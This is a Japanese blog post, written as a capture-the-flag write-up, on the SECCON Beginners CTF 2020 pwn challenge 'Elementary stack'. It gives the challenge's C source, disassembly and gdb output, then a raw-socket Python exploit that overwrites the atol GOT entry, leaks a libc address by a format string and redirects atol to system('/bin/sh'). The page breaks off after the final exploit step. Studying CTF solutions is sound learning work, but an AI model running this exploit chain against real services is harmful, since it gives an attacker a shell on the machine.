<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width,initial-scale=1">
    <title>SECCON Beginners CTF 2020 Elementary stackを理解する | terassyi</title>
    <meta name="description" content="ctf4bで得ことができなかったPwnのelementary stackを理解するまでをメモ．">
    <meta name="generator" content="VuePress 1.4.0">
    <meta property="article:published_time" content="2020-06-04T00:00:00.000Z"><meta property="article:modified_time" content="2020-06-04T11:45:55.000Z"><meta property="og:site_name" content="terassyi"><meta property="og:title" content="SECCON Beginners CTF 2020 Elementary stackを理解する"><meta property="og:description" content="ctf4bで得ことができなかったPwnのelementary stackを理解するまでをメモ．"><meta property="og:type" content="website"><meta property="og:url" content="/posts/2020/06/04/elementary-stack.html"><meta name="twitter:title" content="SECCON Beginners CTF 2020 Elementary stackを理解する"><meta name="twitter:description" content="ctf4bで得ことができなかったPwnのelementary stackを理解するまでをメモ．"><meta name="twitter:url" content="/posts/2020/06/04/elementary-stack.html"><meta name="twitter:card" content="summary_large_image"><meta name="twitter:label2" content="Filed under"><meta name="twitter:data2" content="ctf, ctf4b, seccon, pwn, stack"><meta property="article:tag" content="ctf"><meta property="article:tag" content="ctf4b"><meta property="article:tag" content="seccon"><meta property="article:tag" content="pwn"><meta property="article:tag" content="stack">
    <link rel="preload" href="/assets/css/0.styles.59c2fb62.css" as="style"><link rel="preload" href="/assets/js/app.dcfa1660.js" as="script"><link rel="preload" href="/assets/js/10.b0186384.js" as="script"><link rel="preload" href="/assets/js/20.285273ee.js" as="script"><link rel="prefetch" href="/assets/js/1.e8d6dc79.js"><link rel="prefetch" href="/assets/js/11.4ec12c96.js"><link rel="prefetch" href="/assets/js/12.f8afba66.js"><link rel="prefetch" href="/assets/js/13.d02e2fa8.js"><link rel="prefetch" href="/assets/js/14.ce2cd9e7.js"><link rel="prefetch" href="/assets/js/15.2be46745.js"><link rel="prefetch" href="/assets/js/16.bf085fee.js"><link rel="prefetch" href="/assets/js/17.1ed29426.js"><link rel="prefetch" href="/assets/js/18.bca0d097.js"><link rel="prefetch" href="/assets/js/19.d5820c36.js"><link rel="prefetch" href="/assets/js/21.a1c766d9.js"><link rel="prefetch" href="/assets/js/22.d3ac44a5.js"><link rel="prefetch" href="/assets/js/23.47b88ab6.js"><link rel="prefetch" href="/assets/js/24.24ddebeb.js"><link rel="prefetch" href="/assets/js/25.f84190a8.js"><link rel="prefetch" href="/assets/js/26.bbd21711.js"><link rel="prefetch" href="/assets/js/27.297f4d2f.js"><link rel="prefetch" href="/assets/js/28.9cf804ef.js"><link rel="prefetch" href="/assets/js/29.0b6ee526.js"><link rel="prefetch" href="/assets/js/3.d7714460.js"><link rel="prefetch" href="/assets/js/30.5517c85c.js"><link rel="prefetch" href="/assets/js/31.dfb23974.js"><link rel="prefetch" href="/assets/js/32.8972be4b.js"><link rel="prefetch" href="/assets/js/33.e0ca9f27.js"><link rel="prefetch" href="/assets/js/34.2ce9cdb5.js"><link rel="prefetch" href="/assets/js/35.90a5a3f9.js"><link rel="prefetch" href="/assets/js/4.3fd29e1b.js"><link rel="prefetch" href="/assets/js/5.185a277d.js"><link rel="prefetch" href="/assets/js/6.e1dafc01.js"><link rel="prefetch" href="/assets/js/7.d5c2cb42.js"><link rel="prefetch" href="/assets/js/8.c19945a8.js"><link rel="prefetch" href="/assets/js/9.60a12ce3.js">
    <link rel="stylesheet" href="/assets/css/0.styles.59c2fb62.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div id="vuepress-theme-meteorlxy"><header class="header" style="background-size:cover;background-repeat:no-repeat;background-position:center;background-attachment:scroll;background-image:url(/img/bg.jpg);" data-v-7a046aea><div data-v-e4145d0a data-v-7a046aea><nav class="navbar" data-v-e4145d0a><div class="container" data-v-e4145d0a><a href="/" class="router-link-active" data-v-e4145d0a><span class="navbar-site-name" data-v-e4145d0a>
          terassyi
        </span></a> <div class="navbar-toggler" data-v-e4145d0a><svg class="icon" style="font-size:1.2em;" data-v-e4145d0a data-v-e4145d0a><title data-v-e4145d0a data-v-e4145d0a>menu</title><use xlink:href="#icon-menu" data-v-e4145d0a data-v-e4145d0a></use></svg></div> <div class="navbar-links" data-v-e4145d0a><a href="/" class="navbar-link" data-v-e4145d0a>
            Home
          </a><a href="/posts/" class="navbar-link router-link-active" data-v-e4145d0a>
            Posts
          </a><a href="/about/" class="navbar-link" data-v-e4145d0a>
            About
          </a></div></div></nav> <div class="navbar-holder" style="display:none;" data-v-e4145d0a></div></div> <div class="banner" data-v-98d6aa8c data-v-7a046aea data-v-7a046aea><div class="container" data-v-98d6aa8c><div class="center" data-v-98d6aa8c><h1 data-v-98d6aa8c data-v-7a046aea>
          SECCON Beginners CTF 2020 Elementary stackを理解する
        </h1></div></div></div></header> <div class="container clearfix show-aside" data-v-4dd605a1 data-v-4dd605a1><main class="main" data-v-4dd605a1><div class="post" data-v-4dd605a1 data-v-4dd605a1><section class="post-meta main-div" data-v-4e23451f><section class="post-date clearfix" data-v-4e23451f><span class="create-date" data-v-4e23451f>
      Created : 2020-06-04
    </span> <span class="update-date" data-v-4e23451f>
      Updated : 2020-06-04
    </span></section> <section class="post-links" data-v-4e23451f><a href="/posts/2020/05/24/ctf4b.html" class="post-link" data-v-4e23451f>
      Previous Post : SECCON Beginners CTF 2020解けた問題 writeup
    </a> <a href="/posts/2020/07/15/softether-api.html" class="post-link" data-v-4e23451f>
      Next Post : SoftEther VPN Server APIのGo版を作った
    </a></section></section> <article class="main-div"><div class="post-content content content__default"><p>こんにちは．リモート授業で一度も授業が一度も授業に現れず資料も与えられずにただただ課題のPDFが配布される授業があるのですが，中間試験はしっかりと行われることが告知されて萎えています．今回はCTF4Bから2週間弱たちましたが，解けなかった問題について考えてみました．</p> <p>僕が本番で解けた問題のWrite upは<a href="https://terassyi.net/posts/2020/05/24/ctf4b.html" target="_blank" rel="noopener noreferrer">こちら<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a>．</p> <h2 id="elementary-stack"><a href="#elementary-stack" class="header-anchor">#</a> Elementary stack</h2> <p>Pwnの問題です．本番ではチラッと覗いて難しそうだったのであまり時間をかけず他の問題を考えていましたが．楽しそうなのでこの問題について考えてみました．いくつかwrite upを梯子して僕がどのように考えたのかをメモします．実行ファイル<code>chall</code>と<code>main.c</code>，<code>libc-2.27.so</code>が与えられました．
コードは以下のようになっています．</p> <div class="language-c line-numbers-mode"><pre class="language-c"><code><span class="token keyword">long</span> <span class="token function">readlong</span><span class="token punctuation">(</span><span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>msg<span class="token punctuation">,</span> <span class="token keyword">char</span> <span class="token operator">*</span>buf<span class="token punctuation">,</span> <span class="token keyword">int</span> size<span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">&quot;%s&quot;</span><span class="token punctuation">,</span> msg<span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> buf<span class="token punctuation">,</span> size<span class="token punctuation">)</span> <span class="token operator">&lt;=</span> <span class="token number">0</span><span class="token punctuation">)</span>
    <span class="token function">fatal</span><span class="token punctuation">(</span><span class="token string">&quot;I/O error&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  buf<span class="token punctuation">[</span>size <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token number">0</span><span class="token punctuation">;</span>
  <span class="token keyword">return</span> <span class="token function">atol</span><span class="token punctuation">(</span>buf<span class="token punctuation">)</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
  <span class="token keyword">int</span> i<span class="token punctuation">;</span>
  <span class="token keyword">long</span> v<span class="token punctuation">;</span>
  <span class="token keyword">char</span> <span class="token operator">*</span>buffer<span class="token punctuation">;</span>
  <span class="token keyword">unsigned</span> <span class="token keyword">long</span> x<span class="token punctuation">[</span>X_NUMBER<span class="token punctuation">]</span><span class="token punctuation">;</span>
  <span class="token keyword">if</span> <span class="token punctuation">(</span><span class="token punctuation">(</span>buffer <span class="token operator">=</span> <span class="token function">malloc</span><span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">==</span> <span class="token constant">NULL</span><span class="token punctuation">)</span>
    <span class="token function">fatal</span><span class="token punctuation">(</span><span class="token string">&quot;Memory error&quot;</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
  <span class="token keyword">while</span><span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
    i <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">int</span><span class="token punctuation">)</span><span class="token function">readlong</span><span class="token punctuation">(</span><span class="token string">&quot;index: &quot;</span><span class="token punctuation">,</span> buffer<span class="token punctuation">,</span> <span class="token number">0x20</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    v <span class="token operator">=</span> <span class="token function">readlong</span><span class="token punctuation">(</span><span class="token string">&quot;value: &quot;</span><span class="token punctuation">,</span> buffer<span class="token punctuation">,</span> <span class="token number">0x20</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">&quot;x[%d] = %ld\n&quot;</span><span class="token punctuation">,</span> i<span class="token punctuation">,</span> v<span class="token punctuation">)</span><span class="token punctuation">;</span>
    x<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> v<span class="token punctuation">;</span>
  <span class="token punctuation">}</span>
  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span>
<span class="token punctuation">}</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br><span class="line-number">27</span><br><span class="line-number">28</span><br><span class="line-number">29</span><br></div></div><p>無限ループに囲まれているのでmain関数のリターンアドレスを書き換えるようなことはできなさそうです．<code>malloc</code>で<code>buffer</code>の領域を保持してそこに<code>read</code>を使用して値を書き込んで配列xに値を書き込んでいくプログラムのようです．
mallocした場所に入力値を格納しているのですが，ローカル変数<code>*buffer</code>として保持した領域のポインタを持っているのでなんとかなりそう．
<code>/bin/sh</code>をどうやって実行させるかを考えますが，今回は<code>readlong</code>関数内の<code>atol</code>をGOT overwriteして<code>system('/bin/sh')</code>を呼び出すべきだったようです．しかし，libcのアドレスがわからないので<code>system</code>のアドレスがわからないんですね．ここで僕は全くわからなかったんですが，一度<code>atol@got</code>を<code>printf</code>に書き換えることで<code>atol(buf)</code>を<code>printf(buf)</code>とすることでformat string bugを発生させることが出来るそうです．なるほどすごい．format string attackでlibcのアドレスをリークすることで<code>system</code>関数を呼び出すことが出来るようになります．
手順的には以下のような感じ．</p> <ol><li><code>atol@got</code>を<code>printf</code>に書き換える</li> <li><code>printf(buf)</code>を実行させてformat string bugを発生させてlibcのアドレスをリーク</li> <li><code>system</code>のアドレスを計算</li> <li><code>atol</code>を<code>system</code>に向ける</li></ol> <p>手順は理解しましたが実際にやるのは難しいですよね．やってみます．</p> <h3 id="解いてみる"><a href="#解いてみる" class="header-anchor">#</a> 解いてみる</h3> <h4 id="ステップ1"><a href="#ステップ1" class="header-anchor">#</a> ステップ1</h4> <p>手順1をまずはクリアしましょう．<code>atol@got</code>を<code>printf</code>に書き換えるためには</p> <div class="language-c line-numbers-mode"><pre class="language-c"><code>x<span class="token punctuation">[</span>i<span class="token punctuation">]</span> <span class="token operator">=</span> v<span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>ここを利用します．<code>x[i]=atolのアドレス</code>，<code>v=printfのアドレス</code>という風に指定できれば書き換えが可能です．
書き換えには<code>*buffer</code>を利用します．ディスアセンブルの結果をみてみます．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>   0x00000000004007c7 &lt;+41&gt;:	mov    rax,QWORD PTR [rbp-0x50]
   0x00000000004007cb &lt;+45&gt;:	mov    edx,0x20
   0x00000000004007d0 &lt;+50&gt;:	mov    rsi,rax
   0x00000000004007d3 &lt;+53&gt;:	lea    rdi,[rip+0x100]        # 0x4008da
   0x00000000004007da &lt;+60&gt;:	call   0x40072a &lt;readlong&gt;
   0x00000000004007df &lt;+65&gt;:	mov    DWORD PTR [rbp-0x54],eax
   0x00000000004007e2 &lt;+68&gt;:	mov    rax,QWORD PTR [rbp-0x50]
   0x00000000004007e6 &lt;+72&gt;:	mov    edx,0x20
   0x00000000004007eb &lt;+77&gt;:	mov    rsi,rax
   0x00000000004007ee &lt;+80&gt;:	lea    rdi,[rip+0xed]        # 0x4008e2
   0x00000000004007f5 &lt;+87&gt;:	call   0x40072a &lt;readlong&gt;
   0x00000000004007fa &lt;+92&gt;:	mov    QWORD PTR [rbp-0x48],rax
   0x00000000004007fe &lt;+96&gt;:	mov    rdx,QWORD PTR [rbp-0x48]
   0x0000000000400802 &lt;+100&gt;:	mov    eax,DWORD PTR [rbp-0x54]
   0x0000000000400805 &lt;+103&gt;:	mov    esi,eax
   0x0000000000400807 &lt;+105&gt;:	lea    rdi,[rip+0xdc]        # 0x4008ea
   0x000000000040080e &lt;+112&gt;:	mov    eax,0x0
   0x0000000000400813 &lt;+117&gt;:	call   0x400590 &lt;printf@plt&gt;
   0x0000000000400818 &lt;+122&gt;:	mov    rdx,QWORD PTR [rbp-0x48]
   0x000000000040081c &lt;+126&gt;:	mov    eax,DWORD PTR [rbp-0x54]
   0x000000000040081f &lt;+129&gt;:	cdqe   
   0x0000000000400821 &lt;+131&gt;:	mov    QWORD PTR [rbp+rax*8-0x40],rdx
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br></div></div><p>少し長いですが，<code>buffer</code>は<code>rbp-0x50</code>に格納されています．また，配列xの先頭アドレスは<code>rbp-0x40</code>のようですね．入力されたi, vは最終的にrax, rdxに格納されて</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>mov    QWORD PTR [rbp+rax*8-0x40],rdx
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>で<code>x[i]=v</code>に対応する処理を行っています．つまり，<code>i= -2</code>とすることができれば，上の命令を<code>rbp-0x50</code>つまり<code>*buffer</code>にvの値を代入する処理にすることができます．</p> <p>さて，<code>atol</code>のアドレスは<code>readlong</code>を覗くと<code>call 0x4005d0 &lt;atol@plt&gt;</code>とあるので<code>0x4005d0</code>を覗くと</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>   0x00000000004005d0 &lt;atol@plt+0&gt;:	jmp    QWORD PTR [rip+0x200a6a]        # 0x601040
   0x00000000004005d6 &lt;atol@plt+6&gt;:	push   0x5
   0x00000000004005db &lt;atol@plt+11&gt;:	jmp    0x400570
   0x00000000004005e0 &lt;exit@plt+0&gt;:	jmp    QWORD PTR [rip+0x200a62]        # 0x601048
   0x00000000004005e6 &lt;exit@plt+6&gt;:	push   0x6
   0x00000000004005eb &lt;exit@plt+11&gt;:	jmp    0x400570
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>とあります．なので<code>*buffer=0x601040</code>とすれば<code>atol</code>のアドレスは書き換え可能ですね．
次の<code>readlong</code>の呼び出しで<code>printf</code>のアドレスを書き込みます．<code>printf</code>のアドレスは<code>0x400590</code>です．
しかし，これで試してみるとうまくいきません．
<code>buffer</code>に<code>atol@got</code>を書き込み，<code>atol@got</code>を<code>printf@plt</code>に書き換えてprintf関数を呼び出すわけですが，この時に<code>*buffer = atol@got = printf@plt</code>となっているためアドレスリークのために<code>%p</code>などを入力すると<code>*buffer = atol@got = printf@plt = &quot;%32$p&quot;</code>となり，printf関数のアドレスが上書きされて呼び出されなくなってしまいます．
これを防ぐために，<code>atol@got</code>ではなく，一つ前の<code>malloc@got</code>を<code>*buffer</code>に格納します．
アドレスのマッピングは以下のようになっています．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>   0x00000000004005c0 &lt;malloc@plt+0&gt;:	jmp    QWORD PTR [rip+0x200a72]        # 0x601038
   0x00000000004005c6 &lt;malloc@plt+6&gt;:	push   0x4
   0x00000000004005cb &lt;malloc@plt+11&gt;:	jmp    0x400570
   0x00000000004005d0 &lt;atol@plt+0&gt;:	jmp    QWORD PTR [rip+0x200a6a]        # 0x601040
   0x00000000004005d6 &lt;atol@plt+6&gt;:	push   0x5
   0x00000000004005db &lt;atol@plt+11&gt;:	jmp    0x400570
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p><code>malloc@got</code>を<code>*buffer</code>に格納して，<code>'a'*8 + printf@plt</code>のように書き込むことで8バイト分の余白を持たせつつ<code>atol@got</code>を<code>printf@plt</code>に書き換えることができます．</p> <p>ここまででのソルバーのコードはこんな感じ．問題の構造を理解するために<code>pwntools</code>などは使わずにやってみます(素人すぎて使い方知らないだけ)．</p> <div class="language-python line-numbers-mode"><pre class="language-python"><code><span class="token keyword">import</span> socket<span class="token punctuation">,</span> time<span class="token punctuation">,</span> telnetlib
s <span class="token operator">=</span> socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span>socket<span class="token punctuation">.</span>AF_INET<span class="token punctuation">,</span> socket<span class="token punctuation">.</span>SOCK_STREAM<span class="token punctuation">)</span>
s<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">'es.quals.beginners.seccon.jp'</span><span class="token punctuation">,</span> <span class="token number">9003</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b'-2\n'</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] overwrite buffer address to atol@got&quot;</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token builtin">str</span><span class="token punctuation">(</span><span class="token number">0x601038</span><span class="token punctuation">)</span><span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token comment"># malloc</span>
<span class="token comment"># s.sendall(str(0x601040).encode()) # atol</span>
<span class="token comment"># time.sleep(1)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] overwrite atol@got to printf@plt&quot;</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b&quot;a&quot;</span><span class="token operator">*</span><span class="token number">8</span> <span class="token operator">+</span> <span class="token punctuation">(</span><span class="token number">0x400590</span><span class="token punctuation">)</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">'little'</span><span class="token punctuation">)</span> <span class="token operator">+</span> <span class="token string">b'\n'</span><span class="token punctuation">)</span> <span class="token comment"># printf</span>
<span class="token comment"># s.sendall((0x400590).to_bytes(8, 'little'))</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br><span class="line-number">14</span><br><span class="line-number">15</span><br><span class="line-number">16</span><br><span class="line-number">17</span><br><span class="line-number">18</span><br><span class="line-number">19</span><br><span class="line-number">20</span><br><span class="line-number">21</span><br><span class="line-number">22</span><br><span class="line-number">23</span><br><span class="line-number">24</span><br><span class="line-number">25</span><br><span class="line-number">26</span><br></div></div><p>念のため各処理のあと１秒スリープさせています．
ここで注意して欲しいのは<code>malloc@got</code>をアドレスを書き込む時です．最初は<code>(0x601038).to_bytes(8, 'little')</code>のようにリトルエンディアンに変換して書き込んでいたんですが，これではうまくいきません．入力された値は<code>read</code>で文字列で読み込まれて<code>atol</code>でlongに変換されるのでバイト列で入力したら意図した値を書き込めないんですね〜．素直にアドレスの数値を書き込みましょう．ここ少しはまりました．何はともあれこれでステップ１は完了です．次にいきましょう．</p> <h4 id="ステップ2"><a href="#ステップ2" class="header-anchor">#</a> ステップ2</h4> <p>ステップ２はprintf関数を使用してformat string attackを行いlibcのアドレスをリークします．
format string attackについては<a href="https://ptr-yudai.hatenablog.com/entry/2018/10/06/234120" target="_blank" rel="noopener noreferrer">こちらの記事<svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg></a>を参照してください．
libcのベースアドレスを取得するためにprintf関数を実行している時のスタックをみてみます．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>gdb-peda$ x/32g $rsp
0x7fffffffddd0:	0x0000000000000001	0x00000001f7ffe170
0x7fffffffdde0:	0x0000000000602260	0x0000000000000000
0x7fffffffddf0:	0x0000000000000002	0x000000000040087d
0x7fffffffde00:	0x00007ffff7de59a0	0x0000000000000000
0x7fffffffde10:	0x0000000000400830	0x00000000004005f0
0x7fffffffde20:	0x00007fffffffdf10	0x0000000000000000
0x7fffffffde30:	0x0000000000400830	0x00007ffff7a05b97
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p>こんな感じです．libcのアドレスは実行ごとに変化するので確定した値はありませんが，毎回末尾に<code>b97</code>が現れるメモリがありますね．このメモリの値が差す場所をみてみます．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>gdb-peda$ x/4wx 0x7ffff7a05b97
0x7ffff7a05b97 &lt;__libc_start_main+231&gt;:	0x82e8c789	0x48000215	0xed23058b	0xc148003c
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>こんな感じになっており，ここが<code>__libc_start_main+231</code>であることがわかります．というわけで<code>%[n]$p</code>で番号を指定してアドレスを取得します．他の方のwrite upでは25を指定しています．どうやって25というのがわかったんでしょう．僕はやり方がわからなかったので頑張って番号をインクリメントしながら探しました．というわけで25を指定すればlibcのアドレスがわかります．</p> <div class="language-python line-numbers-mode"><pre class="language-python"><code><span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">&quot;[info] address leak by format string attack&quot;</span><span class="token punctuation">)</span>
s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b&quot;%25$p&quot;</span> <span class="token operator">+</span> <span class="token string">b'\n'</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br></div></div><p>上記のコードを先ほどのコードに追記します．
不明な点はありますがなんとかlibcのアドレスを取得できました．次のステップでは<code>system</code>関数のアドレスを計算します．</p> <h4 id="ステップ3"><a href="#ステップ3" class="header-anchor">#</a> ステップ3</h4> <p><code>system</code>関数のアドレスを計算して求めましょう．
まずはlibcのベースアドレスを求めます．ステップ2で求めたのは<code>__libc_start_main+231</code>でした．
<code>__libc_start_main</code>のアドレスは以下のようにして見つけることができました．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>$ objdump -S -M intel ./libc-2.27.so | grep libc_start_main
0000000000021ab0 &lt;__libc_start_main@@GLIBC_2.2.5&gt;:
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>従って，libcのベースアドレスは<code>[__libc_start_main+231の値] - 0x21ab0 - 231</code>となります．
次にlibcのsystem関数のアドレスを取得します．</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>$ objdump -S -M intel ./libc-2.27.so | grep libc_system
000000000004f440 &lt;__libc_system@@GLIBC_PRIVATE&gt;:
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p>従って，system関数のアドレスは<code>system = libc_base + 0x4f440</code>で求めることができます．
ステップ4に進みましょう．</p> <h4 id="ステップ4"><a href="#ステップ4" class="header-anchor">#</a> ステップ4</h4> <p>system関数のアドレスがわかったので<code>atol@got</code>を書き換えましょう．引数には<code>/bin/sh</code>を入れます．
入力バッファは現在<code>malloc@got</code>からとっています．<code>atol(buf)</code>(現在は<code>printf(buf)</code>を指している)は<code>atol</code>を<code>system</code>に書き換えると，<code>system(buf)</code>として実行されます．つまり，入力する値は<code>&quot;/bin/sh\0&quot; + systemのアドレス</code>とすれば<code>system(&quot;/bin/sh&quot;)</code>が呼び出されます．
以下をコードに追記してください．</p> <div class="language-python line-numbers-mode"><pre class="language-python"><code>s<span class="token punctuation">.</span>sendall<span class="token punctuation">(</span><span class="token string">b&quot;/bin/sh\0&quot;</span> <span class="token operator">+</span> system<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">8</span><span class="token punctuation">,</span> <span class="token string">'little'</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span>s<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">2048</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
